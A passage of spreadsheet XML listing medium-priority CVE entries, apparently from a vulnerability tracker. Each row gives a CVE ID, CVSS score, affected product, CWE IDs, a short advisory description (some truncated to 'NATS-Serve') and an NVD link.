        </is>
      </c>
      <c r="E2548" s="5" t="inlineStr"/>
      <c r="F2548" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G2548" s="5" t="inlineStr"/>
      <c r="H2548" s="5" t="inlineStr">
        <is>
          <t>linuxfoundation:nats-server</t>
        </is>
      </c>
      <c r="I2548" s="5" t="inlineStr">
        <is>
          <t>2026-03-25</t>
        </is>
      </c>
      <c r="J2548" s="5" t="inlineStr"/>
      <c r="K2548" s="5" t="inlineStr">
        <is>
          <t>CWE-1286, CWE-190</t>
        </is>
      </c>
      <c r="L2548" s="5" t="inlineStr">
        <is>
          <t>NATS-Serve</t>
        </is>
      </c>
      <c r="M2548" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-27889</t>
        </is>
      </c>
    </row>
    <row r="2549">
      <c r="A2549" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2549" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-28604</t>
        </is>
      </c>
      <c r="C2549" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2549" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2549" s="5" t="inlineStr"/>
      <c r="F2549" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2549" s="5" t="inlineStr"/>
      <c r="H2549" s="5" t="inlineStr"/>
      <c r="I2549" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2549" s="5" t="inlineStr"/>
      <c r="K2549" s="5" t="inlineStr">
        <is>
          <t>CWE-362</t>
        </is>
      </c>
      <c r="L2549" s="5" t="inlineStr">
        <is>
          <t>In multiple locations, there is a possible use after free due to a race condition. This could lead to remote code execution with no additional execution privileges needed. User interaction is not needed for exploitation.</t>
        </is>
      </c>
      <c r="M2549" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-28604</t>
        </is>
      </c>
    </row>
    <row r="2550">
      <c r="A2550" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2550" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-29074</t>
        </is>
      </c>
      <c r="C2550" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2550" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2550" s="5" t="inlineStr"/>
      <c r="F2550" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G2550" s="5" t="inlineStr">
        <is>
          <t>java, node.js</t>
        </is>
      </c>
      <c r="H2550" s="5" t="inlineStr">
        <is>
          <t>svgo:svgo</t>
        </is>
      </c>
      <c r="I2550" s="5" t="inlineStr">
        <is>
          <t>2026-03-06</t>
        </is>
      </c>
      <c r="J2550" s="5" t="inlineStr"/>
      <c r="K2550" s="5" t="inlineStr">
        <is>
          <t>CWE-776</t>
        </is>
      </c>
      <c r="L2550" s="5" t="inlineStr">
        <is>
          <t>SVGO, short for SVG Optimizer, is a Node.js library and command-line application for optimizing SVG files. From version 2.1.0 to before version 2.8.1, from version 3.0.0 to before version 3.3.3, and before version 4.0.1, SVGO accepts XML with custom entities, without guards against entity expansion or recursion. This can result in a small XML file (811 bytes) stalling the application and even crashing the Node.js process with JavaScript heap out of memory. This issue has been patched in versions 2.8.1, 3.3.3, and 4.0.1.</t>
        </is>
      </c>
      <c r="M2550" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-29074</t>
        </is>
      </c>
    </row>
    <row r="2551">
      <c r="A2551" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2551" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-29181</t>
        </is>
      </c>
      <c r="C2551" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2551" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2551" s="5" t="inlineStr"/>
      <c r="F2551" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G2551" s="5" t="inlineStr"/>
      <c r="H2551" s="5" t="inlineStr">
        <is>
          <t>opentelemetry:opentelemetry</t>
        </is>
      </c>
      <c r="I2551" s="5" t="inlineStr">
        <is>
          <t>2026-04-07</t>
        </is>
      </c>
      <c r="J2551" s="5" t="inlineStr"/>
      <c r="K2551" s="5" t="inlineStr">
        <is>
          <t>CWE-770</t>
        </is>
      </c>
      <c r="L2551" s="5" t="inlineStr">
        <is>
          <t>OpenTelemetry-Go is the Go implementation of OpenTelemetry. From 1.36.0 to 1.40.0, multi-value baggage: header extraction parses each header field-value independently and aggregates members across values. This allows an attacker to amplify cpu and allocations by sending many baggage: header lines, even when each individual value is within the 8192-byte per-value parse limit. This vulnerability is fixed in 1.41.0.</t>
        </is>
      </c>
      <c r="M2551" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-29181</t>
        </is>
      </c>
    </row>
    <row r="2552">
      <c r="A2552" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2552" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-29785</t>
        </is>
      </c>
      <c r="C2552" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2552" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2552" s="5" t="inlineStr"/>
      <c r="F2552" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G2552" s="5" t="inlineStr"/>
      <c r="H2552" s="5" t="inlineStr">
        <is>
          <t>linuxfoundation:nats-server</t>
        </is>
      </c>
      <c r="I2552" s="5" t="inlineStr">
        <is>
          <t>2026-03-25</t>
        </is>
      </c>
      <c r="J2552" s="5" t="inlineStr"/>
      <c r="K2552" s="5" t="inlineStr">
        <is>
          <t>CWE-409, CWE-476</t>
        </is>
      </c>
      <c r="L2552" s="5" t="inlineStr">
        <is>
          <t>NATS-Serve</t>
        </is>
      </c>
      <c r="M2552" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-29785</t>
        </is>
      </c>
    </row>
    <row r="2553">
      <c r="A2553" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2553" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-3039</t>
        </is>
      </c>
      <c r="C2553" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2553" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2553" s="5" t="inlineStr"/>
      <c r="F2553" s="5" t="n">
        <v>0.01</v>
      </c>
      <c r="G2553" s="5" t="inlineStr">
        <is>
          <t>active directory</t>
        </is>
      </c>
      <c r="H2553" s="5" t="inlineStr">
        <is>
          <t>isc:bind</t>
        </is>
      </c>
      <c r="I2553" s="5" t="inlineStr">
        <is>
          <t>2026-05-20</t>
        </is>
      </c>
      <c r="J2553" s="5" t="inlineStr"/>
      <c r="K2553" s="5" t="inlineStr">
        <is>
          <t>CWE-770, CWE-771</t>
        </is>
      </c>
      <c r="L2553" s="5" t="inlineStr">
        <is>
          <t>BIND servers that are configured to use TKEY-based authentication via GSS-API tokens are vulnerable to excessive memory consumption when receiving and processing maliciously-constructed packets.  Typically these servers will be found in Active Directory integrated DNS deployments and/or Kerberos-secured DNS environments.
This issue affects BIND 9 versions 9.0.0 through 9.16.50, 9.18.0 through 9.18.48, 9.20.0 through 9.20.22, 9.21.0 through 9.21.21, 9.9.3-S1 through 9.16.50-S1, 9.18.11-S1 through 9.18.48-S1, and 9.20.9-S1 through 9.20.22-S1.</t>
        </is>
      </c>
      <c r="M2553" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-3039</t>
        </is>
      </c>
    </row>
    <row r="2554">
      <c r="A2554" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2554" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-30866</t>
        </is>
      </c>
      <c r="C2554" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2554" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2554" s="5" t="inlineStr"/>
      <c r="F2554" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2554" s="5" t="inlineStr"/>
      <c r="H2554" s="5" t="inlineStr"/>
      <c r="I2554" s="5" t="inlineStr">
        <is>
          <t>2026-08-21</t>
        </is>
      </c>
      <c r="J2554" s="5" t="inlineStr"/>
      <c r="K2554" s="5" t="inlineStr">
        <is>
          <t>CWE-200, CWE-306</t>
        </is>
      </c>
      <c r="L2554" s="5" t="inlineStr">
        <is>
          <t>Combodo iTop is a web based IT service management tool. Prior to 3.2.3, unauthenticated users can access uploaded sensitive via sniffed url. This issue has been fixed in version 3.2.3.</t>
        </is>
      </c>
      <c r="M2554" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-30866</t>
        </is>
      </c>
    </row>
    <row r="2555">
      <c r="A2555" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2555" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-30922</t>
        </is>
      </c>
      <c r="C2555" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2555" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2555" s="5" t="inlineStr"/>
      <c r="F2555" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G2555" s="5" t="inlineStr">
        <is>
          <t>python</t>
        </is>
      </c>
      <c r="H2555" s="5" t="inlineStr">
        <is>
          <t>pyasn1:pyasn1</t>
        </is>
      </c>
      <c r="I2555" s="5" t="inlineStr">
        <is>
          <t>2026-03-18</t>
        </is>
      </c>
      <c r="J2555" s="5" t="inlineStr"/>
      <c r="K2555" s="5" t="inlineStr">
        <is>
          <t>CWE-674, CWE-835</t>
        </is>
      </c>
      <c r="L2555" s="5" t="inlineStr">
        <is>
          <t>pyasn1 is a generic ASN.1 library for Python. Prior to 0.6.3, the `pyasn1` library is vulnerable to a Denial of Service (DoS) attack caused by uncontrolled recursion when decoding ASN.1 data with deeply nested structures. An attacker can supply a crafted payload containing thousands of nested `SEQUENCE` (`0x30`) or `SET` (`0x31`) tags with "Indefinite Length" (`0x80`) markers. This forces the decoder to recursively call itself until the Python interpreter crashes with a `RecursionError` or consumes all available memory (OOM), crashing the host application. This is a distinct vulnerability from CVE-2026-23490 (which addressed integer overflows in OID decoding). The fix for CVE-2026-23490 (`MAX_OID_ARC_CONTINUATION_OCTETS`) does not mitigate this recursion issue. Version 0.6.3 fixes this specific issue.</t>
        </is>
      </c>
      <c r="M2555" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-30922</t>
        </is>
      </c>
    </row>
    <row r="2556">
      <c r="A2556" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2556" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-3174</t>
        </is>
      </c>
      <c r="C2556" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2556" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2556" s="5" t="inlineStr"/>
      <c r="F2556" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2556" s="5" t="inlineStr"/>
      <c r="H2556" s="5" t="inlineStr"/>
      <c r="I2556" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2556" s="5" t="inlineStr"/>
      <c r="K2556" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L2556" s="5" t="inlineStr">
        <is>
          <t>The Event Tickets and Registration plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the Stripe OAuth return endpoint in all versions up to, and including, 5.27.4. This makes it possible for unauthenticated attackers to overwrite the site's Stripe merchant credentials (access tokens, publishable keys, and account ID), diverting all subsequent payment processing to the attacker's Stripe account.</t>
        </is>
      </c>
      <c r="M2556" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-3174</t>
        </is>
      </c>
    </row>
    <row r="2557">
      <c r="A2557" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2557" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-32280</t>
        </is>
      </c>
      <c r="C2557" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2557" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2557" s="5" t="inlineStr"/>
      <c r="F2557" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G2557" s="5" t="inlineStr"/>
      <c r="H2557" s="5" t="inlineStr">
        <is>
          <t>golang:go</t>
        </is>
      </c>
      <c r="I2557" s="5" t="inlineStr">
        <is>
          <t>2026-04-08</t>
        </is>
      </c>
      <c r="J2557" s="5" t="inlineStr"/>
      <c r="K2557" s="5" t="inlineStr">
        <is>
          <t>CWE-770</t>
        </is>
      </c>
      <c r="L2557" s="5" t="inlineStr">
        <is>
          <t>During chain building, the amount of work that is done is not correctly limited when a large number of intermediate certificates are passed in VerifyOptions.Intermediates, which can lead to a denial of service. This affects both direct users of crypto/x509 and users of crypto/tls.</t>
        </is>
      </c>
      <c r="M2557" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-32280</t>
        </is>
      </c>
    </row>
    <row r="2558">
      <c r="A2558" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2558" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-32283</t>
        </is>
      </c>
      <c r="C2558" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2558" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2558" s="5" t="inlineStr"/>
      <c r="F2558" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G2558" s="5" t="inlineStr"/>
      <c r="H2558" s="5" t="inlineStr">
        <is>
          <t>golang:go</t>
        </is>
      </c>
      <c r="I2558" s="5" t="inlineStr">
        <is>
          <t>2026-04-08</t>
        </is>
      </c>
      <c r="J2558" s="5" t="inlineStr"/>
      <c r="K2558" s="5" t="inlineStr">
        <is>
          <t>CWE-764, CWE-770</t>
        </is>
      </c>
      <c r="L2558" s="5" t="inlineStr">
        <is>
          <t>If one side of the TLS connection sends multiple key update messages post-handshake in a single record, the connection can deadlock, causing uncontrolled consumption of resources. This can lead to a denial of service. This only affects TLS 1.3.</t>
        </is>
      </c>
      <c r="M2558" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-32283</t>
        </is>
      </c>
    </row>
    <row r="2559">
      <c r="A2559" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2559" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-32285</t>
        </is>
      </c>
      <c r="C2559" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2559" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2559" s="5" t="inlineStr"/>
      <c r="F2559" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G2559" s="5" t="inlineStr"/>
      <c r="H2559" s="5" t="inlineStr">
        <is>
          <t>jsonparser_project:jsonparser</t>
        </is>
      </c>
      <c r="I2559" s="5" t="inlineStr">
        <is>
          <t>2026-03-26</t>
        </is>
      </c>
      <c r="J2559" s="5" t="inlineStr"/>
      <c r="K2559" s="5" t="inlineStr">
        <is>
          <t>CWE-1285, CWE-129</t>
        </is>
      </c>
      <c r="L2559" s="5" t="inlineStr">
        <is>
          <t>The Delete function fails to properly validate offsets when processing malformed JSON input. This can lead to a negative slice index and a runtime panic, allowing a denial of service attack.</t>
        </is>
      </c>
      <c r="M2559" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-32285</t>
        </is>
      </c>
    </row>
    <row r="2560">
      <c r="A2560" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2560" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-32286</t>
        </is>
      </c>
      <c r="C2560" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2560" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2560" s="5" t="inlineStr"/>
      <c r="F2560" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G2560" s="5" t="inlineStr">
        <is>
          <t>postgresql</t>
        </is>
      </c>
      <c r="H2560" s="5" t="inlineStr">
        <is>
          <t>jackc:pgproto3</t>
        </is>
      </c>
      <c r="I2560" s="5" t="inlineStr">
        <is>
          <t>2026-03-26</t>
        </is>
      </c>
      <c r="J2560" s="5" t="inlineStr"/>
      <c r="K2560" s="5" t="inlineStr">
        <is>
          <t>CWE-1285, CWE-129</t>
        </is>
      </c>
      <c r="L2560" s="5" t="inlineStr">
        <is>
          <t>The DataRow.Decode function fails to properly validate field lengths. A malicious or compromised PostgreSQL server can send a DataRow message with a negative field length, causing a slice bounds out of range panic.</t>
        </is>
      </c>
      <c r="M2560" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-32286</t>
        </is>
      </c>
    </row>
    <row r="2561">
      <c r="A2561" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2561" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-32597</t>
        </is>
      </c>
      <c r="C2561" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2561" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2561" s="5" t="inlineStr"/>
      <c r="F2561" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2561" s="5" t="inlineStr">
        <is>
          <t>python</t>
        </is>
      </c>
      <c r="H2561" s="5" t="inlineStr">
        <is>
          <t>pyjwt_project:pyjwt</t>
        </is>
      </c>
      <c r="I2561" s="5" t="inlineStr">
        <is>
          <t>2026-03-13</t>
        </is>
      </c>
      <c r="J2561" s="5" t="inlineStr"/>
      <c r="K2561" s="5" t="inlineStr">
        <is>
          <t>CWE-345, CWE-347, CWE-863</t>
        </is>
      </c>
      <c r="L2561" s="5" t="inlineStr">
        <is>
          <t>PyJWT is a JSON Web Token implementation in Python. Prior to 2.12.0, PyJWT does not validate the crit (Critical) Header Parameter defined in RFC 7515 §4.1.11. When a JWS token contains a crit array listing extensions that PyJWT does not understand, the library accepts the token instead of rejecting it. This violates the MUST requirement in the RFC. This vulnerability is fixed in 2.12.0.</t>
        </is>
      </c>
      <c r="M2561" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-32597</t>
        </is>
      </c>
    </row>
    <row r="2562">
      <c r="A2562" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2562" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-33216</t>
        </is>
      </c>
      <c r="C2562" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2562" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2562" s="5" t="inlineStr"/>
      <c r="F2562" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G2562" s="5" t="inlineStr"/>
      <c r="H2562" s="5" t="inlineStr">
        <is>
          <t>linuxfoundation:nats-server</t>
        </is>
      </c>
      <c r="I2562" s="5" t="inlineStr">
        <is>
          <t>2026-03-25</t>
        </is>
      </c>
      <c r="J2562" s="5" t="inlineStr"/>
      <c r="K2562" s="5" t="inlineStr">
        <is>
          <t>CWE-213, CWE-256</t>
        </is>
      </c>
      <c r="L2562" s="5" t="inlineStr">
        <is>
          <t>NATS-Serve</t>
        </is>
      </c>
      <c r="M2562" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-33216</t>
        </is>
      </c>
    </row>
    <row r="2563">
      <c r="A2563" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2563" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-33218</t>
        </is>
      </c>
      <c r="C2563" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2563" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2563" s="5" t="inlineStr"/>
      <c r="F2563" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G2563" s="5" t="inlineStr"/>
      <c r="H2563" s="5" t="inlineStr">
        <is>
          <t>linuxfoundation:nats-server</t>
        </is>
      </c>
      <c r="I2563" s="5" t="inlineStr">
        <is>
          <t>2026-03-25</t>
        </is>
      </c>
      <c r="J2563" s="5" t="inlineStr"/>
      <c r="K2563" s="5" t="inlineStr">
        <is>
          <t>CWE-1286, CWE-20</t>
        </is>
      </c>
      <c r="L2563" s="5" t="inlineStr">
        <is>
          <t>NATS-Serve</t>
        </is>
      </c>
      <c r="M2563" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-33218</t>
        </is>
      </c>
    </row>
    <row r="2564">
      <c r="A2564" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2564" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-33231</t>
        </is>
      </c>
      <c r="C2564" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2564" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2564" s="5" t="inlineStr"/>
      <c r="F2564" s="5" t="n">
        <v>0.012</v>
      </c>
      <c r="G2564" s="5" t="inlineStr">
        <is>
          <t>f5, python</t>
        </is>
      </c>
      <c r="H2564" s="5" t="inlineStr">
        <is>
          <t>nltk:nltk</t>
        </is>
      </c>
      <c r="I2564" s="5" t="inlineStr">
        <is>
          <t>2026-03-20</t>
        </is>
      </c>
      <c r="J2564" s="5" t="inlineStr"/>
      <c r="K2564" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="L2564" s="5" t="inlineStr">
        <is>
          <t>NLTK (Natural Language Toolkit) is a suite of open source Python modules, data sets, and tutorials supporting research and development in Natural Language Processing. In versions 3.9.3 and prior, `nltk.app.wordnet_app` allows unauthenticated remote shutdown of the local WordNet Browser HTTP server when it is started in its default mode. A simple `GET /SHUTDOWN%20THE%20SERVER` request causes the process to terminate immediately via `os._exit(0)`, resulting in a denial of service. Commit bbaae83db86a0f49e00f5b0db44a7254c268de9b patches the issue.</t>
        </is>
      </c>
      <c r="M2564" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-33231</t>
        </is>
      </c>
    </row>
    <row r="2565">
      <c r="A2565" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2565" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-33487</t>
        </is>
      </c>
      <c r="C2565" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2565" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2565" s="5" t="inlineStr"/>
      <c r="F2565" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2565" s="5" t="inlineStr"/>
      <c r="H2565" s="5" t="inlineStr">
        <is>
          <t>goxmldsig_project:goxmldsig</t>
        </is>
      </c>
      <c r="I2565" s="5" t="inlineStr">
        <is>
          <t>2026-03-26</t>
        </is>
      </c>
      <c r="J2565" s="5" t="inlineStr"/>
      <c r="K2565" s="5" t="inlineStr">
        <is>
          <t>CWE-347, CWE-682</t>
        </is>
      </c>
      <c r="L2565" s="5" t="inlineStr">
        <is>
          <t>goxmlsig provides XML Digital Signatures implemented in Go. Prior to version 1.6.0, the `validateSignature` function in `validate.go` goes through the references in the `SignedInfo` block to find one that matches the signed element's ID. In Go versions before 1.22, or when `go.mod` uses an older version, there is a loop variable capture issue. The code takes the address of the loop variable `_ref` instead of its value. As a result, if more than one reference matches the ID or if the loop logic is incorrect, the `ref` pointer will always end up pointing to the last element in the `SignedInfo.References` slice after the loop. goxmlsig version 1.6.0 contains a patch.</t>
        </is>
      </c>
      <c r="M2565" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-33487</t>
        </is>
      </c>
    </row>
    <row r="2566">
      <c r="A2566" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2566" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-33630</t>
        </is>
      </c>
      <c r="C2566" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2566" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2566" s="5" t="inlineStr"/>
      <c r="F2566" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G2566" s="5" t="inlineStr"/>
      <c r="H2566" s="5" t="inlineStr"/>
      <c r="I2566" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="J2566" s="5" t="inlineStr"/>
      <c r="K2566" s="5" t="inlineStr">
        <is>
          <t>CWE-415, CWE-416</t>
        </is>
      </c>
      <c r="L2566" s="5" t="inlineStr">
        <is>
          <t>c-ares is an asynchronous resolver library. From ver 1.32.3 until 1.34.7, a use-after-free / double-free in c-ares' query-completion handling. The same flaw — a query's callback being invoked while the query is still linked in the channel's internal lookup structures — is present at multiple points in the resend/finish path (timeout handling, response handling, and query dispatch). If the query, or for ares_getaddrinfo() the owning host_query, is freed as a side effect of that callback, it is then accessed and/or freed a second time. This vulnerability is fixed in ver 1.34.7.</t>
        </is>
      </c>
      <c r="M2566" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-33630</t>
        </is>
      </c>
    </row>
    <row r="2567">
      <c r="A2567" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2567" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-33811</t>
        </is>
      </c>
      <c r="C2567" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2567" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2567" s="5" t="inlineStr"/>
      <c r="F2567" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G2567" s="5" t="inlineStr"/>
      <c r="H2567" s="5" t="inlineStr">
        <is>
          <t>golang:go</t>
        </is>
      </c>
      <c r="I2567" s="5" t="inlineStr">
        <is>
          <t>2026-05-07</t>
        </is>
      </c>
      <c r="J2567" s="5" t="inlineStr"/>
      <c r="K2567" s="5" t="inlineStr">
        <is>
          <t>CWE-1341, CWE-415</t>
        </is>
      </c>
      <c r="L2567" s="5" t="inlineStr">
        <is>
          <t>When using LookupCNAME with the cgo DNS resolver, a very long CNAME response can trigger a double-free of C memory and a crash.</t>
        </is>
      </c>
      <c r="M2567" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-33811</t>
        </is>
      </c>
    </row>
    <row r="2568">
      <c r="A2568" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2568" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-33814</t>
        </is>
      </c>
      <c r="C2568" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2568" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2568" s="5" t="inlineStr"/>
      <c r="F2568" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G2568" s="5" t="inlineStr"/>
      <c r="H2568" s="5" t="inlineStr">
        <is>
          <t>golang:go, golang:http2</t>
        </is>
      </c>
      <c r="I2568" s="5" t="inlineStr">
        <is>
          <t>2026-05-07</t>
        </is>
      </c>
      <c r="J2568" s="5" t="inlineStr"/>
      <c r="K2568" s="5" t="inlineStr">
        <is>
          <t>CWE-606, CWE-835</t>
        </is>
      </c>
      <c r="L2568" s="5" t="inlineStr">
        <is>
          <t>When processing HTTP/2 SETTINGS frames, transport will enter an infinite loop of writing CONTINUATION frames if it receives a SETTINGS_MAX_FRAME_SIZE with a value of 0.</t>
        </is>
      </c>
      <c r="M2568" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-33814</t>
        </is>
      </c>
    </row>
    <row r="2569">
      <c r="A2569" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2569" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-33870</t>
        </is>
      </c>
      <c r="C2569" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2569" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2569" s="5" t="inlineStr"/>
      <c r="F2569" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G2569" s="5" t="inlineStr"/>
      <c r="H2569" s="5" t="inlineStr">
        <is>
          <t>netty:netty</t>
        </is>
      </c>
      <c r="I2569" s="5" t="inlineStr">
        <is>
          <t>2026-03-27</t>
        </is>
      </c>
      <c r="J2569" s="5" t="inlineStr"/>
